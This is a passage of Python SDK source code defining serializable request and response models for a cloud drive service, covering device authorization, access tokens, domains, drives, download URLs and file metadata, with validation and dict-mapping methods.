        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class DeviceAuthorizeRequest(TeaModel):
    """Request payload for authorizing a device.

    Note: unlike most models in this file, the wire keys are PascalCase
    ('ClientID', 'DeviceName', ...), not the snake_case attribute names.
    """

    # (attribute name, wire key) pairs in serialization order.
    _KEY_MAP = (
        ('client_id', 'ClientID'),
        ('device_info', 'DeviceInfo'),
        ('device_name', 'DeviceName'),
        ('login_type', 'LoginType'),
        ('scope', 'Scope'),
    )

    def __init__(
        self,
        client_id: str = None,
        device_info: str = None,
        device_name: str = None,
        login_type: str = None,
        scope: List[str] = None,
    ):
        # Client ID: use the AppID returned when the App was created
        self.client_id = client_id
        # device information, used to let the user identify the device
        self.device_info = device_info
        # device name; the caller must guarantee uniqueness across devices
        # (hardware name + hardware model is recommended)
        self.device_name = device_name
        # authentication method; currently 'ding' and 'ram' are supported
        self.login_type = login_type
        # requested permission list; defaults to all permissions
        self.scope = scope

    def validate(self):
        """Check that client_id and device_name are present."""
        self.validate_required(self.client_id, 'client_id')
        self.validate_required(self.device_name, 'device_name')

    def to_map(self):
        """Serialize every non-None field under its PascalCase wire key."""
        result = dict()
        for attr, key in self._KEY_MAP:
            value = getattr(self, attr)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m* using the PascalCase wire keys."""
        m = m or dict()
        for attr, key in self._KEY_MAP:
            if m.get(key) is not None:
                setattr(self, attr, m.get(key))
        return self
class FileDeltaResponse(TeaModel):
    """One file-operation record in a delta stream."""

    def __init__(
        self,
        current_category: str = None,
        file: BaseCCPFileResponse = None,
        file_id: str = None,
        op: str = None,
    ):
        self.current_category = current_category
        self.file = file
        self.file_id = file_id
        self.op = op

    def validate(self):
        """Delegate validation to the nested file model, if present."""
        if self.file:
            self.file.validate()

    def to_map(self):
        """Serialize every non-None field; the nested file via its to_map."""
        result = dict()
        if self.current_category is not None:
            result['current_category'] = self.current_category
        if self.file is not None:
            result['file'] = self.file.to_map()
        if self.file_id is not None:
            result['file_id'] = self.file_id
        if self.op is not None:
            result['op'] = self.op
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; the nested file via its from_map."""
        m = m or dict()
        for field in ('current_category', 'file_id', 'op'):
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        if m.get('file') is not None:
            self.file = BaseCCPFileResponse().from_map(m['file'])
        return self
class GetAccessTokenByLinkInfoRequest(TeaModel):
    """Request payload for obtaining an access token by link info."""

    _FIELDS = ('headers', 'extra', 'identity', 'type')

    def __init__(
        self,
        headers: Dict[str, str] = None,
        extra: str = None,
        identity: str = None,
        type: str = None,
    ):
        self.headers = headers
        # extra information; e.g. when type is 'mobile' this is the country
        # calling code, defaulting to 86 when unset
        self.extra = extra
        # unique identity
        self.identity = identity
        # authentication type
        self.type = type

    def validate(self):
        """Check that identity and type are present."""
        self.validate_required(self.identity, 'identity')
        self.validate_required(self.type, 'type')

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class GetAppPublicKeyRequest(TeaModel):
    """Request payload for fetching an App's public key."""

    def __init__(
        self,
        app_id: str = None,
    ):
        # App ID
        self.app_id = app_id

    def validate(self):
        # app_id is mandatory for this request.
        self.validate_required(self.app_id, 'app_id')

    def to_map(self):
        """Serialize the set field into a plain dict."""
        result = dict()
        for field in ('app_id',):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in ('app_id',):
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class GetAppRequest(TeaModel):
    """Request payload for fetching an App."""

    def __init__(
        self,
        app_id: str = None,
    ):
        # App ID
        self.app_id = app_id

    def validate(self):
        # app_id is mandatory for this request.
        self.validate_required(self.app_id, 'app_id')

    def to_map(self):
        """Serialize the set field into a plain dict."""
        result = dict()
        for field in ('app_id',):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in ('app_id',):
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class GetAsyncTaskResponse(TeaModel):
    """Response body of a get-async-task call.

    Reports the state and progress of an asynchronous task, plus an
    optional download URL when the task produces one.
    """

    def __init__(
        self,
        async_task_id: str = None,
        consumed_process: int = None,
        err_code: int = None,
        message: str = None,
        state: str = None,
        total_process: int = None,
        url: str = None,
    ):
        # async_task_id
        # type: string
        # NOTE: the line above was previously a bare `type:string` statement
        # (a comment that had lost its `#`); restored as a comment.
        self.async_task_id = async_task_id
        # consumed_process
        self.consumed_process = consumed_process
        # err_code
        self.err_code = err_code
        # message
        self.message = message
        # state
        self.state = state
        # total_process
        self.total_process = total_process
        # download_url
        # example
        # NOTE: the 'example' line above was previously a bare `example`
        # statement, which raised NameError on every construction of this
        # model; restored as a comment.
        self.url = url

    def validate(self):
        # No constraints on this response.
        pass

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        if self.async_task_id is not None:
            result['async_task_id'] = self.async_task_id
        if self.consumed_process is not None:
            result['consumed_process'] = self.consumed_process
        if self.err_code is not None:
            result['err_code'] = self.err_code
        if self.message is not None:
            result['message'] = self.message
        if self.state is not None:
            result['state'] = self.state
        if self.total_process is not None:
            result['total_process'] = self.total_process
        if self.url is not None:
            result['url'] = self.url
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        if m.get('async_task_id') is not None:
            self.async_task_id = m.get('async_task_id')
        if m.get('consumed_process') is not None:
            self.consumed_process = m.get('consumed_process')
        if m.get('err_code') is not None:
            self.err_code = m.get('err_code')
        if m.get('message') is not None:
            self.message = m.get('message')
        if m.get('state') is not None:
            self.state = m.get('state')
        if m.get('total_process') is not None:
            self.total_process = m.get('total_process')
        if m.get('url') is not None:
            self.url = m.get('url')
        return self
class GetBizCNameInfoRequest(TeaModel):
    """Request for business CNAME info of a domain."""

    def __init__(
        self,
        cname_type: str = None,
        domain_id: str = None,
        is_vpc: bool = None,
    ):
        # cname type
        self.cname_type = cname_type
        # domain ID
        self.domain_id = domain_id
        # is vpc
        self.is_vpc = is_vpc

    def validate(self):
        # cname_type and domain_id are mandatory; is_vpc is optional
        self.validate_required(self.cname_type, 'cname_type')
        self.validate_required(self.domain_id, 'domain_id')

    def to_map(self):
        # every map key matches its attribute name
        entries = {
            'cname_type': self.cname_type,
            'domain_id': self.domain_id,
            'is_vpc': self.is_vpc,
        }
        return {key: value for key, value in entries.items() if value is not None}

    def from_map(self, m: dict = None):
        source = m or {}
        for field in ('cname_type', 'domain_id', 'is_vpc'):
            value = source.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class GetByLinkInfoRequest(TeaModel):
    """Request to look up account link info by identity."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        extra: str = None,
        identity: str = None,
        type: str = None,
    ):
        # extra request headers
        self.headers = headers
        # Extra info; e.g. when type is 'mobile' this is the country
        # calling code, defaulting to 86 when omitted
        self.extra = extra
        # unique identity
        self.identity = identity
        # authentication type
        self.type = type

    def validate(self):
        # identity and type are mandatory
        self.validate_required(self.identity, 'identity')
        self.validate_required(self.type, 'type')

    def to_map(self):
        # every map key matches its attribute name
        entries = {
            'headers': self.headers,
            'extra': self.extra,
            'identity': self.identity,
            'type': self.type,
        }
        return {key: value for key, value in entries.items() if value is not None}

    def from_map(self, m: dict = None):
        source = m or {}
        for field in ('headers', 'extra', 'identity', 'type'):
            value = source.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class GetCaptchaRequest(TeaModel):
    """Request to fetch a captcha for an app."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        app_id: str = None,
    ):
        # extra request headers
        self.headers = headers
        # App ID of the app being accessed
        self.app_id = app_id

    def validate(self):
        # app_id is mandatory; headers are optional
        self.validate_required(self.app_id, 'app_id')

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.app_id is not None:
            mapping['app_id'] = self.app_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        for field in ('headers', 'app_id'):
            value = source.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class GetCorsRuleListRequest(TeaModel):
    """Request to list CORS rules of a domain."""

    def __init__(
        self,
        domain_id: str = None,
    ):
        # domain ID
        self.domain_id = domain_id

    def validate(self):
        # domain_id is the only field and it is mandatory
        self.validate_required(self.domain_id, 'domain_id')

    def to_map(self):
        mapping = {}
        if self.domain_id is not None:
            mapping['domain_id'] = self.domain_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        domain_id = source.get('domain_id')
        if domain_id is not None:
            self.domain_id = domain_id
        return self
class GetDataCNameInfoRequest(TeaModel):
    """Request for data CNAME info of a domain."""

    def __init__(
        self,
        domain_id: str = None,
    ):
        # domain ID
        self.domain_id = domain_id

    def validate(self):
        # domain_id is the only field and it is mandatory
        self.validate_required(self.domain_id, 'domain_id')

    def to_map(self):
        mapping = {}
        if self.domain_id is not None:
            mapping['domain_id'] = self.domain_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        domain_id = source.get('domain_id')
        if domain_id is not None:
            self.domain_id = domain_id
        return self
class GetDirSizeInfoResponse(TeaModel):
    """Response carrying size information of a folder."""

    def __init__(
        self,
        dir_count: int = None,
        file_count: int = None,
        size: int = None,
    ):
        # number of sub-directories
        self.dir_count = dir_count
        # number of files
        self.file_count = file_count
        # total size
        self.size = size

    def validate(self):
        # response model: nothing to validate
        pass

    def to_map(self):
        # every map key matches its attribute name
        entries = {
            'dir_count': self.dir_count,
            'file_count': self.file_count,
            'size': self.size,
        }
        return {key: value for key, value in entries.items() if value is not None}

    def from_map(self, m: dict = None):
        source = m or {}
        for field in ('dir_count', 'file_count', 'size'):
            value = source.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class GetDomainRequest(TeaModel):
    """Request to fetch a domain by its ID."""

    def __init__(
        self,
        domain_id: str = None,
    ):
        # Domain ID
        self.domain_id = domain_id

    def validate(self):
        # domain_id is the only field and it is mandatory
        self.validate_required(self.domain_id, 'domain_id')

    def to_map(self):
        mapping = {}
        if self.domain_id is not None:
            mapping['domain_id'] = self.domain_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        domain_id = source.get('domain_id')
        if domain_id is not None:
            self.domain_id = domain_id
        return self
class RateLimit(TeaModel):
    """Download rate-limit configuration."""

    def __init__(
        self,
        part_size: int = None,
        part_speed: int = None,
    ):
        # size of each throttled part
        self.part_size = part_size
        # allowed speed per part
        self.part_speed = part_speed

    def validate(self):
        # no constraints on either field
        pass

    def to_map(self):
        # every map key matches its attribute name
        entries = {
            'part_size': self.part_size,
            'part_speed': self.part_speed,
        }
        return {key: value for key, value in entries.items() if value is not None}

    def from_map(self, m: dict = None):
        source = m or {}
        for field in ('part_size', 'part_speed'):
            value = source.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class GetDownloadUrlResponse(TeaModel):
    """Get download URL response."""

    def __init__(
        self,
        expiration: str = None,
        method: str = None,
        ratelimit: RateLimit = None,
        size: int = None,
        streams_url: dict = None,
        url: str = None,
    ):
        # expiration of the url
        self.expiration = expiration
        # HTTP method for the url
        self.method = method
        # optional download rate-limit settings
        self.ratelimit = ratelimit
        # file size
        self.size = size
        # streams url info
        self.streams_url = streams_url
        # download url
        self.url = url

    def validate(self):
        # cascade into the nested rate-limit model when present
        if self.ratelimit:
            self.ratelimit.validate()

    def to_map(self):
        # build all entries in declaration order, serialize the nested
        # model, then drop the unset ones
        entries = {
            'expiration': self.expiration,
            'method': self.method,
            'ratelimit': self.ratelimit.to_map() if self.ratelimit is not None else None,
            'size': self.size,
            'streams_url': self.streams_url,
            'url': self.url,
        }
        return {key: value for key, value in entries.items() if value is not None}

    def from_map(self, m: dict = None):
        source = m or {}
        for field in ('expiration', 'method', 'size', 'streams_url', 'url'):
            value = source.get(field)
            if value is not None:
                setattr(self, field, value)
        # ratelimit is a nested model and needs deserialization
        if source.get('ratelimit') is not None:
            self.ratelimit = RateLimit().from_map(source['ratelimit'])
        return self
class GetDriveResponse(TeaModel):
    """Get drive response."""

    # every serialized key equals its attribute name
    _FIELDS = (
        'creator', 'description', 'domain_id', 'drive_id', 'drive_name',
        'drive_type', 'encrypt_data_access', 'encrypt_mode', 'owner',
        'relative_path', 'status', 'store_id', 'total_size', 'used_size',
    )

    def __init__(
        self,
        creator: str = None,
        description: str = None,
        domain_id: str = None,
        drive_id: str = None,
        drive_name: str = None,
        drive_type: str = None,
        encrypt_data_access: bool = None,
        encrypt_mode: str = None,
        owner: str = None,
        relative_path: str = None,
        status: str = None,
        store_id: str = None,
        total_size: int = None,
        used_size: int = None,
    ):
        # drive creator
        self.creator = creator
        # drive description
        self.description = description
        # Domain ID
        self.domain_id = domain_id
        # Drive ID
        self.drive_id = drive_id
        # drive name
        self.drive_name = drive_name
        # drive type
        self.drive_type = drive_type
        self.encrypt_data_access = encrypt_data_access
        self.encrypt_mode = encrypt_mode
        # drive owner
        self.owner = owner
        # path relative to the backing store; returned when the
        # domain PathType is OSSPath
        self.relative_path = relative_path
        # drive status
        self.status = status
        # store ID; returned when the domain PathType is OSSPath
        self.store_id = store_id
        # total drive quota
        self.total_size = total_size
        # used drive space
        self.used_size = used_size

    def validate(self):
        # response model: nothing to validate
        pass

    def to_map(self):
        result = {}
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        source = m or {}
        for field in self._FIELDS:
            value = source.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class GetFileByPathResponse(TeaModel):
    """
    Get file metadata by path response.

    Fix: stray generator artifacts ``type: boolean`` (left as bare
    annotation statements under the hidden/starred comments) are now
    part of the comments.
    """
    def __init__(
        self,
        category: str = None,
        characteristic_hash: str = None,
        content_hash: str = None,
        content_hash_name: str = None,
        content_type: str = None,
        crc_64hash: str = None,
        created_at: str = None,
        description: str = None,
        domain_id: str = None,
        download_url: str = None,
        drive_id: str = None,
        encrypt_mode: str = None,
        file_extension: str = None,
        file_id: str = None,
        hidden: bool = None,
        image_media_metadata: ImageMediaResponse = None,
        labels: List[str] = None,
        meta: str = None,
        name: str = None,
        parent_file_id: str = None,
        punish_flag: int = None,
        share_id: str = None,
        size: int = None,
        starred: bool = None,
        status: str = None,
        streams_info: dict = None,
        thumbnail: str = None,
        trashed_at: str = None,
        type: str = None,
        updated_at: str = None,
        upload_id: str = None,
        url: str = None,
        user_meta: str = None,
        video_media_metadata: VideoMediaResponse = None,
        video_preview_metadata: VideoPreviewResponse = None,
    ):
        # category
        self.category = category
        # CharacteristicHash
        self.characteristic_hash = characteristic_hash
        # Content Hash
        self.content_hash = content_hash
        # content_hash_name
        self.content_hash_name = content_hash_name
        # content_type
        self.content_type = content_type
        # crc64_hash
        self.crc_64hash = crc_64hash
        # created_at
        self.created_at = created_at
        # description
        self.description = description
        # DomainID
        self.domain_id = domain_id
        # download_url
        self.download_url = download_url
        # drive_id
        self.drive_id = drive_id
        # encrypt_mode
        self.encrypt_mode = encrypt_mode
        # file_extension
        self.file_extension = file_extension
        # file_id
        self.file_id = file_id
        # hidden (type: boolean)
        self.hidden = hidden
        # image media metadata
        self.image_media_metadata = image_media_metadata
        # labels
        self.labels = labels
        # meta
        self.meta = meta
        # name
        self.name = name
        # parent_file_id
        self.parent_file_id = parent_file_id
        # punish_flag
        self.punish_flag = punish_flag
        # share_id
        self.share_id = share_id
        # Size
        self.size = size
        # starred (type: boolean)
        self.starred = starred
        # status
        self.status = status
        # @Deprecated streams url info
        self.streams_info = streams_info
        # thumbnail
        self.thumbnail = thumbnail
        # trashed_at
        self.trashed_at = trashed_at
        # type
        self.type = type
        # updated_at
        self.updated_at = updated_at
        # upload_id
        self.upload_id = upload_id
        # url
        self.url = url
        # user_meta
        self.user_meta = user_meta
        # video media metadata
        self.video_media_metadata = video_media_metadata
        # video preview metadata
        self.video_preview_metadata = video_preview_metadata
    def validate(self):
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
        if self.image_media_metadata:
            self.image_media_metadata.validate()
        self.validate_required(self.name, 'name')
        if self.name is not None:
            self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
        if self.parent_file_id is not None:
            self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
            self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
        if self.size is not None:
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)
        if self.video_media_metadata:
            self.video_media_metadata.validate()
        if self.video_preview_metadata:
            self.video_preview_metadata.validate()
    def to_map(self):
        result = dict()
        if self.category is not None:
            result['category'] = self.category
        if self.characteristic_hash is not None:
            result['characteristic_hash'] = self.characteristic_hash
        if self.content_hash is not None:
            result['content_hash'] = self.content_hash
        if self.content_hash_name is not None:
            result['content_hash_name'] = self.content_hash_name
        if self.content_type is not None:
            result['content_type'] = self.content_type
        # note: attribute crc_64hash serializes under key 'crc64_hash'
        if self.crc_64hash is not None:
            result['crc64_hash'] = self.crc_64hash
        if self.created_at is not None:
            result['created_at'] = self.created_at
        if self.description is not None:
            result['description'] = self.description
        if self.domain_id is not None:
            result['domain_id'] = self.domain_id
        if self.download_url is not None:
            result['download_url'] = self.download_url
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.encrypt_mode is not None:
            result['encrypt_mode'] = self.encrypt_mode
        if self.file_extension is not None:
            result['file_extension'] = self.file_extension
        if self.file_id is not None:
            result['file_id'] = self.file_id
        if self.hidden is not None:
            result['hidden'] = self.hidden
        if self.image_media_metadata is not None:
            result['image_media_metadata'] = self.image_media_metadata.to_map()
        if self.labels is not None:
            result['labels'] = self.labels
        if self.meta is not None:
            result['meta'] = self.meta
        if self.name is not None:
            result['name'] = self.name
        if self.parent_file_id is not None:
            result['parent_file_id'] = self.parent_file_id
        if self.punish_flag is not None:
            result['punish_flag'] = self.punish_flag
        if self.share_id is not None:
            result['share_id'] = self.share_id
        if self.size is not None:
            result['size'] = self.size
        if self.starred is not None:
            result['starred'] = self.starred
        if self.status is not None:
            result['status'] = self.status
        if self.streams_info is not None:
            result['streams_info'] = self.streams_info
        if self.thumbnail is not None:
            result['thumbnail'] = self.thumbnail
        if self.trashed_at is not None:
            result['trashed_at'] = self.trashed_at
        if self.type is not None:
            result['type'] = self.type
        if self.updated_at is not None:
            result['updated_at'] = self.updated_at
        if self.upload_id is not None:
            result['upload_id'] = self.upload_id
        if self.url is not None:
            result['url'] = self.url
        if self.user_meta is not None:
            result['user_meta'] = self.user_meta
        if self.video_media_metadata is not None:
            result['video_media_metadata'] = self.video_media_metadata.to_map()
        if self.video_preview_metadata is not None:
            result['video_preview_metadata'] = self.video_preview_metadata.to_map()
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('category') is not None:
            self.category = m.get('category')
        if m.get('characteristic_hash') is not None:
            self.characteristic_hash = m.get('characteristic_hash')
        if m.get('content_hash') is not None:
            self.content_hash = m.get('content_hash')
        if m.get('content_hash_name') is not None:
            self.content_hash_name = m.get('content_hash_name')
        if m.get('content_type') is not None:
            self.content_type = m.get('content_type')
        if m.get('crc64_hash') is not None:
            self.crc_64hash = m.get('crc64_hash')
        if m.get('created_at') is not None:
            self.created_at = m.get('created_at')
        if m.get('description') is not None:
            self.description = m.get('description')
        if m.get('domain_id') is not None:
            self.domain_id = m.get('domain_id')
        if m.get('download_url') is not None:
            self.download_url = m.get('download_url')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('encrypt_mode') is not None:
            self.encrypt_mode = m.get('encrypt_mode')
        if m.get('file_extension') is not None:
            self.file_extension = m.get('file_extension')
        if m.get('file_id') is not None:
            self.file_id = m.get('file_id')
        if m.get('hidden') is not None:
            self.hidden = m.get('hidden')
        if m.get('image_media_metadata') is not None:
            temp_model = ImageMediaResponse()
            self.image_media_metadata = temp_model.from_map(m['image_media_metadata'])
        if m.get('labels') is not None:
            self.labels = m.get('labels')
        if m.get('meta') is not None:
            self.meta = m.get('meta')
        if m.get('name') is not None:
            self.name = m.get('name')
        if m.get('parent_file_id') is not None:
            self.parent_file_id = m.get('parent_file_id')
        if m.get('punish_flag') is not None:
            self.punish_flag = m.get('punish_flag')
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        if m.get('size') is not None:
            self.size = m.get('size')
        if m.get('starred') is not None:
            self.starred = m.get('starred')
        if m.get('status') is not None:
            self.status = m.get('status')
        if m.get('streams_info') is not None:
            self.streams_info = m.get('streams_info')
        if m.get('thumbnail') is not None:
            self.thumbnail = m.get('thumbnail')
        if m.get('trashed_at') is not None:
            self.trashed_at = m.get('trashed_at')
        if m.get('type') is not None:
            self.type = m.get('type')
        if m.get('updated_at') is not None:
            self.updated_at = m.get('updated_at')
        if m.get('upload_id') is not None:
            self.upload_id = m.get('upload_id')
        if m.get('url') is not None:
            self.url = m.get('url')
        if m.get('user_meta') is not None:
            self.user_meta = m.get('user_meta')
        if m.get('video_media_metadata') is not None:
            temp_model = VideoMediaResponse()
            self.video_media_metadata = temp_model.from_map(m['video_media_metadata'])
        if m.get('video_preview_metadata') is not None:
            temp_model = VideoPreviewResponse()
            self.video_preview_metadata = temp_model.from_map(m['video_preview_metadata'])
        return self
class GetFileResponse(TeaModel):
    """
    Get file metadata response.

    Fix: stray generator artifacts ``type: boolean`` (left as bare
    annotation statements under the hidden/starred comments) are now
    part of the comments.
    """
    def __init__(
        self,
        category: str = None,
        characteristic_hash: str = None,
        content_hash: str = None,
        content_hash_name: str = None,
        content_type: str = None,
        crc_64hash: str = None,
        created_at: str = None,
        description: str = None,
        domain_id: str = None,
        download_url: str = None,
        drive_id: str = None,
        encrypt_mode: str = None,
        file_extension: str = None,
        file_id: str = None,
        hidden: bool = None,
        image_media_metadata: ImageMediaResponse = None,
        labels: List[str] = None,
        meta: str = None,
        name: str = None,
        parent_file_id: str = None,
        punish_flag: int = None,
        share_id: str = None,
        size: int = None,
        starred: bool = None,
        status: str = None,
        streams_info: dict = None,
        thumbnail: str = None,
        trashed_at: str = None,
        type: str = None,
        updated_at: str = None,
        upload_id: str = None,
        url: str = None,
        user_meta: str = None,
        video_media_metadata: VideoMediaResponse = None,
        video_preview_metadata: VideoPreviewResponse = None,
    ):
        # category
        self.category = category
        # CharacteristicHash
        self.characteristic_hash = characteristic_hash
        # Content Hash
        self.content_hash = content_hash
        # content_hash_name
        self.content_hash_name = content_hash_name
        # content_type
        self.content_type = content_type
        # crc64_hash
        self.crc_64hash = crc_64hash
        # created_at
        self.created_at = created_at
        # description
        self.description = description
        # DomainID
        self.domain_id = domain_id
        # download_url
        self.download_url = download_url
        # drive_id
        self.drive_id = drive_id
        # encrypt_mode
        self.encrypt_mode = encrypt_mode
        # file_extension
        self.file_extension = file_extension
        # file_id
        self.file_id = file_id
        # hidden (type: boolean)
        self.hidden = hidden
        # image media metadata
        self.image_media_metadata = image_media_metadata
        # labels
        self.labels = labels
        # meta
        self.meta = meta
        # name
        self.name = name
        # parent_file_id
        self.parent_file_id = parent_file_id
        # punish_flag
        self.punish_flag = punish_flag
        # share_id
        self.share_id = share_id
        # Size
        self.size = size
        # starred (type: boolean)
        self.starred = starred
        # status
        self.status = status
        # @Deprecated streams url info
        self.streams_info = streams_info
        # thumbnail
        self.thumbnail = thumbnail
        # trashed_at
        self.trashed_at = trashed_at
        # type
        self.type = type
        # updated_at
        self.updated_at = updated_at
        # upload_id
        self.upload_id = upload_id
        # url
        self.url = url
        # user_meta
        self.user_meta = user_meta
        # video media metadata
        self.video_media_metadata = video_media_metadata
        # video preview metadata
        self.video_preview_metadata = video_preview_metadata
    def validate(self):
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
        if self.image_media_metadata:
            self.image_media_metadata.validate()
        self.validate_required(self.name, 'name')
        if self.name is not None:
            self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
        if self.parent_file_id is not None:
            self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
            self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
        if self.size is not None:
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)
        if self.video_media_metadata:
            self.video_media_metadata.validate()
        if self.video_preview_metadata:
            self.video_preview_metadata.validate()
    def to_map(self):
        result = dict()
        if self.category is not None:
            result['category'] = self.category
        if self.characteristic_hash is not None:
            result['characteristic_hash'] = self.characteristic_hash
        if self.content_hash is not None:
            result['content_hash'] = self.content_hash
        if self.content_hash_name is not None:
            result['content_hash_name'] = self.content_hash_name
        if self.content_type is not None:
            result['content_type'] = self.content_type
        # note: attribute crc_64hash serializes under key 'crc64_hash'
        if self.crc_64hash is not None:
            result['crc64_hash'] = self.crc_64hash
        if self.created_at is not None:
            result['created_at'] = self.created_at
        if self.description is not None:
            result['description'] = self.description
        if self.domain_id is not None:
            result['domain_id'] = self.domain_id
        if self.download_url is not None:
            result['download_url'] = self.download_url
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.encrypt_mode is not None:
            result['encrypt_mode'] = self.encrypt_mode
        if self.file_extension is not None:
            result['file_extension'] = self.file_extension
        if self.file_id is not None:
            result['file_id'] = self.file_id
        if self.hidden is not None:
            result['hidden'] = self.hidden
        if self.image_media_metadata is not None:
            result['image_media_metadata'] = self.image_media_metadata.to_map()
        if self.labels is not None:
            result['labels'] = self.labels
        if self.meta is not None:
            result['meta'] = self.meta
        if self.name is not None:
            result['name'] = self.name
        if self.parent_file_id is not None:
            result['parent_file_id'] = self.parent_file_id
        if self.punish_flag is not None:
            result['punish_flag'] = self.punish_flag
        if self.share_id is not None:
            result['share_id'] = self.share_id
        if self.size is not None:
            result['size'] = self.size
        if self.starred is not None:
            result['starred'] = self.starred
        if self.status is not None:
            result['status'] = self.status
        if self.streams_info is not None:
            result['streams_info'] = self.streams_info
        if self.thumbnail is not None:
            result['thumbnail'] = self.thumbnail
        if self.trashed_at is not None:
            result['trashed_at'] = self.trashed_at
        if self.type is not None:
            result['type'] = self.type
        if self.updated_at is not None:
            result['updated_at'] = self.updated_at
        if self.upload_id is not None:
            result['upload_id'] = self.upload_id
        if self.url is not None:
            result['url'] = self.url
        if self.user_meta is not None:
            result['user_meta'] = self.user_meta
        if self.video_media_metadata is not None:
            result['video_media_metadata'] = self.video_media_metadata.to_map()
        if self.video_preview_metadata is not None:
            result['video_preview_metadata'] = self.video_preview_metadata.to_map()
        return result
    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('category') is not None:
            self.category = m.get('category')
        if m.get('characteristic_hash') is not None:
            self.characteristic_hash = m.get('characteristic_hash')
        if m.get('content_hash') is not None:
            self.content_hash = m.get('content_hash')
        if m.get('content_hash_name') is not None:
            self.content_hash_name = m.get('content_hash_name')
        if m.get('content_type') is not None:
            self.content_type = m.get('content_type')
        if m.get('crc64_hash') is not None:
            self.crc_64hash = m.get('crc64_hash')
        if m.get('created_at') is not None:
            self.created_at = m.get('created_at')
        if m.get('description') is not None:
            self.description = m.get('description')
        if m.get('domain_id') is not None:
            self.domain_id = m.get('domain_id')
        if m.get('download_url') is not None:
            self.download_url = m.get('download_url')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('encrypt_mode') is not None:
            self.encrypt_mode = m.get('encrypt_mode')
        if m.get('file_extension') is not None:
            self.file_extension = m.get('file_extension')
        if m.get('file_id') is not None:
            self.file_id = m.get('file_id')
        if m.get('hidden') is not None:
            self.hidden = m.get('hidden')
        if m.get('image_media_metadata') is not None:
            temp_model = ImageMediaResponse()
            self.image_media_metadata = temp_model.from_map(m['image_media_metadata'])
        if m.get('labels') is not None:
            self.labels = m.get('labels')
        if m.get('meta') is not None:
            self.meta = m.get('meta')
        if m.get('name') is not None:
            self.name = m.get('name')
        if m.get('parent_file_id') is not None:
            self.parent_file_id = m.get('parent_file_id')
        if m.get('punish_flag') is not None:
            self.punish_flag = m.get('punish_flag')
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        if m.get('size') is not None:
            self.size = m.get('size')
        if m.get('starred') is not None:
            self.starred = m.get('starred')
        if m.get('status') is not None:
            self.status = m.get('status')
        if m.get('streams_info') is not None:
            self.streams_info = m.get('streams_info')
        if m.get('thumbnail') is not None:
